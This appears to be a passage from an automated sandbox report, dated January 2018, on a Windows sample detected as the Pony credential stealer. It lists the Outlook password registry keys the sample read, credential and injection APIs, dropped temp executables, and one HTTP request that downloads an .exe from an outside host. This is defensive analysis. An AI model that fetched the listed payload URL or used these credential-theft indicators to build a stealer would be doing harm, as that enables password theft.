NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\NNTP Server HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\IMAP Server HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\IMAP User Name HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\HTTP User HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\HTTP Server URL HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\POP3 User HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\IMAP User HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\HTTPMail User Name HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\HTTPMail Server HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\SMTP User HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\POP3 Password2 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\IMAP Password2 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\NNTP Password2 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\HTTPMail Password2 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\SMTP Password2 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\POP3 Password HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\IMAP Password HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\NNTP Password HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\HTTP Password HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\SMTP Password HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\POP3 Port HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\SMTP Port HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\IMAP Port HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\SMTP Email Address HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\SMTP Server HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\POP3 Server HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\POP3 User Name HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\SMTP User Name HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\NNTP Email Address HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\NNTP User Name HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\NNTP Server HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\IMAP Server HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\IMAP User Name HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\HTTP User HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\HTTP Server URL HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\POP3 User HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\IMAP User HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\HTTPMail User Name HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\HTTPMail Server HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\SMTP User HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\POP3 Password2 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\IMAP Password2 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\NNTP Password2 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\HTTPMail Password2 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\SMTP Password2 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\POP3 Password HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\IMAP Password HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\NNTP Password HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\HTTP Password HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\SMTP Password HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\POP3 Port HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\SMTP Port HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\IMAP Port HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{3512230a-fb0b-11e5-b945-806e6f6e6963}\Data HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{3512230a-fb0b-11e5-b945-806e6f6e6963}\Generation HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{35122306-fb0b-11e5-b945-806e6f6e6963}\Data HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{35122306-fb0b-11e5-b945-806e6f6e6963}\Generation HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{35122307-fb0b-11e5-b945-806e6f6e6963}\Data HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{35122307-fb0b-11e5-b945-806e6f6e6963}\Generation HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000410 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Language Groups\1 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{0000897b-83df-4b96-be07-0fb58b01c4a4}\LanguageProfile\0x00000000\{0001bea3-ed56-483d-a2e2-aeae25577436}\Enable HKEY_CURRENT_USER\Keyboard Layout\Toggle\Language Hotkey HKEY_CURRENT_USER\Keyboard Layout\Toggle\Hotkey HKEY_CURRENT_USER\Keyboard Layout\Toggle\Layout Hotkey HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\CTF\EnableAnchorContext HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DisableUNCCheck HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\EnableExtensions HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DelayedExpansion HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DefaultColor HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\CompletionChar HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\PathCompletionChar HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\AutoRun HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DisableUNCCheck HKEY_CURRENT_USER\Software\Microsoft\Command Processor\EnableExtensions HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DelayedExpansion HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DefaultColor HKEY_CURRENT_USER\Software\Microsoft\Command Processor\CompletionChar HKEY_CURRENT_USER\Software\Microsoft\Command Processor\PathCompletionChar HKEY_CURRENT_USER\Software\Microsoft\Command Processor\AutoRun
Write Keys
HKEY_CURRENT_USER\Software\WinRAR HKEY_CURRENT_USER\Software\WinRAR\HWID HKEY_CURRENT_USER\Software\WinRAR\D13EAC51CD03EB893DE24FC827B8CDDB
Delete Keys
Nothing to display
Mutexes
Local\_!MSFTHISTORY!_ Local\c:!users!seven01!appdata!local!microsoft!windows!temporary internet files!content.ie5! Local\c:!users!seven01!appdata!roaming!microsoft!windows!cookies! Local\c:!users!seven01!appdata!local!microsoft!windows!history!history.ie5! Local\!IETld!Mutex Local\c:!users!seven01!appdata!roaming!microsoft!windows!ietldcache! Local\MSCTF.Asm.MutexDefault1
Resolved APIs
cryptbase.dll.SystemFunction036 uxtheme.dll.ThemeInitApiHook user32.dll.IsProcessDPIAware oleaut32.dll.OleLoadPictureEx oleaut32.dll.DispCallFunc oleaut32.dll.LoadTypeLibEx oleaut32.dll.UnRegisterTypeLib oleaut32.dll.CreateTypeLib2 oleaut32.dll.VarDateFromUdate oleaut32.dll.VarUdateFromDate oleaut32.dll.GetAltMonthNames oleaut32.dll.VarNumFromParseNum oleaut32.dll.VarParseNumFromStr oleaut32.dll.VarDecFromR4 oleaut32.dll.VarDecFromR8 oleaut32.dll.VarDecFromDate oleaut32.dll.VarDecFromI4 oleaut32.dll.VarDecFromCy oleaut32.dll.VarR4FromDec oleaut32.dll.GetRecordInfoFromTypeInfo oleaut32.dll.GetRecordInfoFromGuids oleaut32.dll.SafeArrayGetRecordInfo oleaut32.dll.SafeArraySetRecordInfo oleaut32.dll.SafeArrayGetIID oleaut32.dll.SafeArraySetIID oleaut32.dll.SafeArrayCopyData oleaut32.dll.SafeArrayAllocDescriptorEx oleaut32.dll.SafeArrayCreateEx oleaut32.dll.VarFormat oleaut32.dll.VarFormatDateTime oleaut32.dll.VarFormatNumber oleaut32.dll.VarFormatPercent oleaut32.dll.VarFormatCurrency oleaut32.dll.VarWeekdayName oleaut32.dll.VarMonthName oleaut32.dll.VarAdd oleaut32.dll.VarAnd oleaut32.dll.VarCat oleaut32.dll.VarDiv oleaut32.dll.VarEqv oleaut32.dll.VarIdiv oleaut32.dll.VarImp oleaut32.dll.VarMod oleaut32.dll.VarMul oleaut32.dll.VarOr oleaut32.dll.VarPow oleaut32.dll.VarSub oleaut32.dll.VarXor oleaut32.dll.VarAbs oleaut32.dll.VarFix oleaut32.dll.VarInt oleaut32.dll.VarNeg oleaut32.dll.VarNot oleaut32.dll.VarRound oleaut32.dll.VarCmp oleaut32.dll.VarDecAdd oleaut32.dll.VarDecCmp oleaut32.dll.VarBstrCat oleaut32.dll.VarCyMulI4 oleaut32.dll.VarBstrCmp ole32.dll.CoCreateInstanceEx ole32.dll.CLSIDFromProgIDEx sxs.dll.SxsOleAut32MapIIDOrCLSIDToTypeLibrary user32.dll.GetSystemMetrics user32.dll.MonitorFromWindow user32.dll.MonitorFromRect user32.dll.MonitorFromPoint user32.dll.EnumDisplayMonitors user32.dll.GetMonitorInfoA dwmapi.dll.DwmIsCompositionEnabled gdi32.dll.GetLayout gdi32.dll.GdiRealizationInfo gdi32.dll.FontIsLinked advapi32.dll.RegOpenKeyExW advapi32.dll.RegQueryInfoKeyW gdi32.dll.GetTextFaceAliasW advapi32.dll.RegEnumValueW advapi32.dll.RegCloseKey advapi32.dll.RegQueryValueExW gdi32.dll.GetFontAssocStatus advapi32.dll.RegQueryValueExA advapi32.dll.RegEnumKeyExW gdi32.dll.GdiIsMetaPrintDC kernel32.dll.EnumUILanguagesW user32.dll.EnumWindows kernel32.dll.VirtualAlloc kernel32.dll.GetTickCount kernel32.dll.Sleep kernel32.dll.SetErrorMode kernel32.dll.SetLastError kernel32.dll.VirtualAllocEx user32.dll.GetCursorPos advapi32.dll.RegOpenKeyExA kernel32.dll.CloseHandle shell32.dll.ShellExecuteW kernel32.dll.WriteFile kernel32.dll.CreateFileW kernel32.dll.TerminateProcess kernel32.dll.VirtualProtectEx kernel32.dll.CreateProcessW kernel32.dll.GetTempPathW kernel32.dll.GetLongPathNameW kernel32.dll.GetFileSize kernel32.dll.ReadFile shell32.dll.SHCreateDirectoryExW ole32.dll.CoTaskMemAlloc ole32.dll.CoTaskMemFree ole32.dll.CoInitializeEx ole32.dll.CreateBindCtx ole32.dll.CoGetApartmentType ole32.dll.CoRegisterInitializeSpy comctl32.dll.#236 oleaut32.dll.#6 ole32.dll.CoGetMalloc comctl32.dll.#320 ole32.dll.StringFromGUID2 comctl32.dll.#324 comctl32.dll.#323 advapi32.dll.RegEnumKeyW oleaut32.dll.#2 ole32.dll.CoUninitialize kernel32.dll.GetCommandLineW ntdll.dll.NtAllocateVirtualMemory ntdll.dll.NtWriteVirtualMemory ntdll.dll.NtTerminateThread ntdll.dll.NtOpenEvent kernel32.dll.ReadProcessMemory ntdll.dll.NtResumeThread kernel32.dll.GetExitCodeProcess ole32.dll.StgOpenStorage crypt32.dll.CryptUnprotectData crypt32.dll.CertOpenSystemStoreA crypt32.dll.CertEnumCertificatesInStore crypt32.dll.CertCloseStore crypt32.dll.CryptAcquireCertificatePrivateKey advapi32.dll.AllocateAndInitializeSid advapi32.dll.CheckTokenMembership advapi32.dll.FreeSid advapi32.dll.CredEnumerateA advapi32.dll.CredFree advapi32.dll.CryptGetUserKey advapi32.dll.CryptExportKey advapi32.dll.CryptDestroyKey advapi32.dll.CryptReleaseContext advapi32.dll.RevertToSelf advapi32.dll.OpenProcessToken advapi32.dll.ImpersonateLoggedOnUser advapi32.dll.GetTokenInformation advapi32.dll.ConvertSidToStringSidA advapi32.dll.LogonUserA advapi32.dll.LookupPrivilegeValueA advapi32.dll.AdjustTokenPrivileges shell32.dll.SHGetFolderPathA netapi32.dll.NetApiBufferFree netapi32.dll.NetUserEnum kernel32.dll.WTSGetActiveConsoleSessionId kernel32.dll.ProcessIdToSessionId msi.dll.MsiGetComponentPathA pstorec.dll.PStoreCreateInstance kernel32.dll.SortGetHandle kernel32.dll.SortCloseHandle kernel32.dll.GetNativeSystemInfo kernel32.dll.IsWow64Process mlang.dll.#112 wininet.dll.FindFirstUrlCacheEntryA kernel32.dll.SetFileInformationByHandle shell32.dll.SHGetFolderPathW urlmon.dll.CreateUri kernel32.dll.InitializeSRWLock kernel32.dll.AcquireSRWLockExclusive kernel32.dll.AcquireSRWLockShared kernel32.dll.ReleaseSRWLockExclusive kernel32.dll.ReleaseSRWLockShared wininet.dll.FindNextUrlCacheEntryA advapi32.dll.AddMandatoryAce ntmarta.dll.GetMartaExtensionInterface version.dll.GetFileVersionInfoSizeW version.dll.GetFileVersionInfoW version.dll.VerQueryValueW urlmon.dll.CreateIUriBuilder urlmon.dll.IntlPercentEncodeNormalize wininet.dll.FindCloseUrlCache userenv.dll.GetUserProfileDirectoryW sechost.dll.ConvertSidToStringSidW setupapi.dll.CM_Get_Device_Interface_List_Size_ExW setupapi.dll.CM_Get_Device_Interface_List_ExW comctl32.dll.#386 samlib.dll.SamConnect rpcrt4.dll.NdrClientCall2 rpcrt4.dll.RpcStringBindingComposeW rpcrt4.dll.RpcBindingFromStringBindingW rpcrt4.dll.RpcStringFreeW rpcrt4.dll.RpcBindingFree samlib.dll.SamGetCompatibilityMode samlib.dll.SamOpenDomain samlib.dll.SamEnumerateDomainsInSamServer samlib.dll.SamLookupDomainInSamServer samlib.dll.SamFreeMemory samlib.dll.SamEnumerateUsersInDomain samlib.dll.SamOpenUser samlib.dll.SamQueryInformationUser samlib.dll.SamQuerySecurityObject samlib.dll.SamGetGroupsForUser samlib.dll.SamRidToSid samlib.dll.SamGetAliasMembership samlib.dll.SamCloseHandle sspicli.dll.LogonUserExExW shell32.dll.ShellExecuteA advapi32.dll.UnregisterTraceGuids comctl32.dll.#321 ole32.dll.CoRevokeInitializeSpy oleaut32.dll.SysAllocString oleaut32.dll.SysStringLen oleaut32.dll.SysFreeString oleaut32.dll.#500 kernel32.dll.SetThreadUILanguage kernel32.dll.CopyFileExW kernel32.dll.IsDebuggerPresent kernel32.dll.SetConsoleInputExeNameW advapi32.dll.SaferIdentifyLevel advapi32.dll.SaferComputeTokenFromLevel advapi32.dll.SaferCloseLevel
Execute Commands
"C:\Users\Seven01\AppData\Local\Temp\filename.exe" C:\Users\Seven01\AppData\Local\Temp\15757203.exe C:\Users\Seven01\AppData\Local\Temp\15759062.bat "C:\Users\Seven01\AppData\Local\Temp\filename.exe"
Started Services
Nothing to display
Created Services
Nothing to display
Behavior analysis details | |||||
---|---|---|---|---|---|
Machine name | Machine label | Machine manager | Started | Ended | Duration |
2018-01-14 22:43:04 | 2018-01-14 22:43:04 |
1 HTTP Request(s) detected
http://nwheilcopters.com/chuksjamil/shit.exe
- Hostname: nwheilcopters.com
- IP Address:
- Port: 80
- Count: 1
GET /chuksjamil/shit.exe HTTP/1.0 Host: nwheilcopters.com Accept: */* Accept-Encoding: identity, *;q=0 Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
Detected family: #Pony
TheSystem Itself @ 2018-01-14 22:54:03
#infosec #automation
TheSystem Itself @ 2018-01-14 22:51:05